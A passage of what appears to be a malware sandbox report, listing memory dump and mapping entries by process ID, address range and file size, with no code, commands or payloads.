                                                                                                                                                                                • memory/4296-341-0x0000000004B10000-0x0000000005116000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6.0MB

                                                                                                                                                                                • memory/4296-277-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4296-305-0x0000000000370000-0x0000000000371000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4316-383-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4316-410-0x0000000005580000-0x0000000005581000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4348-289-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4348-272-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4348-303-0x0000000004F80000-0x0000000005012000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  584KB

                                                                                                                                                                                • memory/4348-278-0x0000000000600000-0x0000000000601000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4348-283-0x0000000005560000-0x0000000005561000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4348-299-0x0000000004FD0000-0x0000000004FD1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4348-304-0x0000000005280000-0x0000000005281000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4352-312-0x0000000002FD0000-0x0000000002FD1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4352-298-0x0000000005560000-0x0000000005561000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4352-274-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4352-288-0x0000000000C60000-0x0000000000C61000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4352-314-0x0000000005710000-0x0000000005711000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4476-354-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  120KB

                                                                                                                                                                                • memory/4476-355-0x000000000041882E-mapping.dmp
                                                                                                                                                                                • memory/4476-363-0x00000000056D0000-0x0000000005CD6000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6.0MB

                                                                                                                                                                                • memory/4492-302-0x00000000005A0000-0x00000000005A1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4492-339-0x0000000004D20000-0x0000000005326000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6.0MB

                                                                                                                                                                                • memory/4492-279-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4628-409-0x000000001AE20000-0x000000001AE22000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  8KB

                                                                                                                                                                                • memory/4628-379-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4660-380-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4700-350-0x0000000003250000-0x00000000032FE000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  696KB

                                                                                                                                                                                • memory/4700-381-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4700-286-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4740-282-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4740-309-0x0000000004F90000-0x000000000548E000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  5.0MB

                                                                                                                                                                                • memory/4740-287-0x00000000006C0000-0x00000000006C1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4804-267-0x00000000005A0000-0x00000000005A1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4804-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4804-271-0x0000000000AC0000-0x0000000000AD9000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  100KB

                                                                                                                                                                                • memory/4804-273-0x000000001B290000-0x000000001B292000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  8KB

                                                                                                                                                                                • memory/4812-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4828-397-0x000001D211460000-0x000001D2114D0000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  448KB

                                                                                                                                                                                • memory/4828-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4828-400-0x000001D2114D0000-0x000001D2115A1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  836KB

                                                                                                                                                                                • memory/4840-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4848-364-0x0000000005700000-0x0000000006026000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  9.1MB

                                                                                                                                                                                • memory/4848-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4848-372-0x0000000000400000-0x000000000367C000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  50.5MB

                                                                                                                                                                                • memory/4860-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4876-343-0x0000000003260000-0x00000000033AA000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.3MB

                                                                                                                                                                                • memory/4876-351-0x0000000000400000-0x000000000325B000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  46.4MB

                                                                                                                                                                                • memory/4876-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4888-315-0x0000000005260000-0x0000000005261000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4888-324-0x00000000052F0000-0x00000000052F1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4888-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4888-306-0x0000000005200000-0x0000000005201000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4888-300-0x0000000005900000-0x0000000005901000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4888-346-0x0000000005450000-0x0000000005451000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4888-284-0x0000000000E90000-0x0000000000E91000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4888-276-0x00000000772E0000-0x000000007746E000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.6MB

                                                                                                                                                                                • memory/4888-329-0x00000000052E0000-0x00000000052E1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4900-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4900-340-0x0000000003270000-0x000000000329E000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  184KB

                                                                                                                                                                                • memory/4900-349-0x0000000000400000-0x000000000325A000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  46.4MB

                                                                                                                                                                                • memory/4908-290-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4908-316-0x00000000030D0000-0x00000000030D1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4908-294-0x0000000000D40000-0x0000000000D41000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4912-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4920-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4920-344-0x0000000004EC0000-0x0000000004F5D000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  628KB

                                                                                                                                                                                • memory/4920-345-0x0000000000400000-0x00000000032A3000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  46.6MB

                                                                                                                                                                                • memory/5052-301-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5052-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5052-374-0x00000000012E2000-0x00000000012E3000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5052-373-0x00000000012E0000-0x00000000012E1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5068-260-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5288-455-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5376-415-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5384-457-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5408-419-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5444-429-0x0000000000400000-0x00000000004A1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  644KB

                                                                                                                                                                                • memory/5444-423-0x000000000046B76D-mapping.dmp
                                                                                                                                                                                • memory/5468-460-0x000000000480F000-0x0000000004910000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.0MB

                                                                                                                                                                                • memory/5468-462-0x0000000004920000-0x000000000497F000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  380KB

                                                                                                                                                                                • memory/5528-426-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5608-430-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5684-445-0x0000000004E40000-0x0000000004E41000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5684-431-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5712-432-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5832-440-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5880-442-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5920-446-0x0000000000000000-mapping.dmp